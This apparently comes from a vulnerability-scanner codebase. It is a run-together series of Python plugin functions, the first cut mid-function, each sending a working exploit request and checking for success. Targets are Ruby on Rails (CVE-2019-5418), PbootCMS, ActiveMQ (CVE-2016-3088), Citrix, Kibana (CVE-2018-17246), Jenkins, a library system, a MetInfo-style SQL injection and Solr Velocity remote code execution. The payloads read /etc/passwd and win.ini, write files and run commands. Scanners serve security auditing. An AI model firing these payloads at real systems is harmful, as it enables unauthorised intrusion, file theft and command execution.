if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "../../../../../../../../etc/passwd{{"
payload_url = scheme + "://" + url +":"+ str(port) + "/robots"
headers = {
'Accept-Encoding': 'gzip, deflate',
'Accept': payload,
'Accept-Language': 'en',
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
}
s = requests.session()
resp = s.get(payload_url, headers=headers,timeout=5, proxies=proxies,verify=False)
con=resp.text
code = resp.status_code
if code== 200 and con.find('root:') != -1 and con.find('bin:') != -1 and con.find('sys:') != -1 and con.find('sync:') != -1 :
Medusa = "{} 存在RubyOnRails任意文件读取(CVE-2019-5418)\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format(url,payload_url,con.encode(encoding='utf-8'))
_t=VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url,RandomAgent,Token,proxies=None):
proxies=ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload="/index.php/index/index?keyword={pboot:if(1)$a=$_GET[b];$a();//)})}}{/pboot:if}&b=phpinfo"
payload_url = scheme + "://" + url +":"+ str(port) + payload
header = {
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
req = request.Request(payload_url, headers=header,)
response = request.urlopen(req)
con = response.read().decode('utf8') # 如果编码报错,去除HTTP Header中的gzip参数即可
code = response.getcode()
if code == 200 and con.find('System') != -1 and con.find('Build Date') != -1 and con.find(
'Compiler') != -1 and con.find('PHP Version') != -1:
Medusa = "{} 存在PbootCMS命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(_t.info, url,Token).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
proxies=ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
PayloadPoc = "/fileserver/Medusa.txt"
PayloadUrl = scheme + '://' + url + ':' + str(port)+PayloadPoc
PayloadCode = ClassCongregation.randoms().result(50)+'@Medusa'
Headers["Connection"]="close"
s = requests.session()
resp = s.put(PayloadUrl, data=PayloadCode, headers=Headers, proxies=proxies,timeout=3,verify=False)
code = resp.status_code
resp2=s.get(PayloadUrl, headers=Headers,proxies=proxies, timeout=3).text
if code==204 and resp2.find(PayloadCode)!=-1:
Medusa = "{} 存在ActiveMQ任意文件写入漏洞(CVE-2016-3088)\r\n漏洞详情:\r\nPayload:{}\r\nPUT内容:{}\r\n".format(url, PayloadUrl,PayloadCode)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l=ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url,RandomAgent,Token,proxies=None):
proxies=ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payloads = ["/vpn/../vpns/services.html", "/vpn/../vpns/cfg/smb.conf"]
for payload in payloads:
payload_url = scheme + '://' + url + ':' + str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
s = requests.session()
resp = s.get(payload_url,headers=headers, timeout=6,proxies=proxies, verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find("encrypt password") != -1 :
Medusa = "{}存在Citrix网关路径遍历漏洞\r\n 验证数据:\r\nPOC:{}\r\n返回内容:{}\r\n".format(url,payload_url,con)
#print(Medusa)
_t=VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(_t.info, url,Token).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
proxies=ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload_url = scheme+'://'+url+':'+str(port)+'/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd'
Headers['Accept']='*/*'
Headers['Content-Type']='application/x-www-form-urlencoded'
resp = requests.get(payload_url, headers=Headers,timeout=5, proxies=proxies,verify=False)
con=resp.text
con_hader=resp.headers
code = resp.status_code
if code== 500 and con.find('{"statusCode":500,"error":"Internal Server Error","message":"An internal server error occurred"}') != -1 and con_hader['kbn-name']=="kibana":
Medusa = "{} 存在Kibana任意文件读取漏洞(CVE-2018-17246)\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format(url,payload_url,con.encode(encoding='utf-8'))
_t=VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url,RandomAgent,proxies=None,**kwargs):
proxies=ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload= "/plugin/credentials/.ini"
payload_url = scheme + "://" + url+ ':' + str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
'Accept-Language': '../../../../../../../../windows/win',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
resp = requests.post(payload_url,headers=headers, proxies=proxies,timeout=6, verify=False)
con = resp.text
code = resp.status_code
if code==200 and con.find('[fonts]')!=-1 and con.find('[extensions]')!=-1 and con.find('[mci extensions]')!=-1:
Medusa = "{}Jenkins任意文件读取漏洞\r\n漏洞详情:\r\nPayload:{}\r\n返回数据包:{}\r\n".format(url, payload_url,con)
_t=VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l=ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
proxies = ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/5clib/kinweblistaction.action?actionName=down&filePath=c:/windows/win.ini"
payload_url = scheme + "://" + url + ":" + str(port) + payload
resp = requests.get(payload_url,
headers=Headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find('MPEGVideo') != -1 and con.find(
'support') != -1:
Medusa = "{}存在五车图书管理系统存在任意文件下载漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(
"Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "42%20and%201=2"
payload2 = "42%20and%201=1"
payload_url = scheme + "://" + url + ":" + str(
port
) + "/admin/index.php?n=message&m=web&c=message&a=domessage&action=add&lang=cn¶137=1¶186=1¶138=1¶139=1¶140=1&id=" + payload
payload_url2 = scheme + "://" + url + ":" + str(
port
) + "/admin/index.php?n=message&m=web&c=message&a=domessage&action=add&lang=cn¶137=1¶186=1¶138=1¶139=1¶140=1&id=" + payload2
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
}
resp = requests.get(payload_url,
headers=headers,
timeout=6,
proxies=proxies,
verify=False)
resp2 = requests.get(payload_url2,
headers=headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
con2 = resp2.text
code = resp.status_code
code2 = resp.status_code
if code == 200 and code2 == 200 and con.find(
'反馈已经被关闭') != -1 and con2.find('验证码错误') != -1 and con != con2:
Medusa = "{}存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}\r\n{}".format(
url, payload_url, con, con2)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(
"Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url,RandomAgent,Token,proxies=None):
proxies=ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
payload_url=scheme + "://" + url + ":" + str(port) +'/solr/admin/cores'
step1 =requests.get(payload_url, timeout=6, proxies=proxies,headers = headers).text
data = json.loads(step1)
if 'status' in data:
name = ''
for x in data['status']:
name = x
payload = "/solr/"+name+"/config"
payload2 = '/solr/' + name + '/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'
payload_url1 = scheme + "://" + url +":"+ str(port)+ payload
payload_url2 = scheme + "://" + url + ":" + str(port) + payload2
payload_data = """{
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}"""
headers1 = {
'User-Agent': RandomAgent,
'Content-Type': 'application/json',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate',
}
resp = requests.post(payload_url1,data=payload_data,headers=headers1, proxies=proxies,timeout=6, verify=False)
resp2 = requests.get(payload_url2, headers=headers, timeout=6,proxies=proxies, verify=False)
con2 = resp2.text
cod2=resp2.status_code
if con2.find("uid=") != -1 and con2.find("groups=") != -1 and con2.find("gid=") != -1 and cod2==200:
Medusa = "{} SolrVelocity模板远程代码执行漏洞\r\n验证数据:\r\nPayload:\r\n{}回显内容:{}\r\n\r\n".format(url,payload_url2,con2)
_t=VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(_t.info, url,Token).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
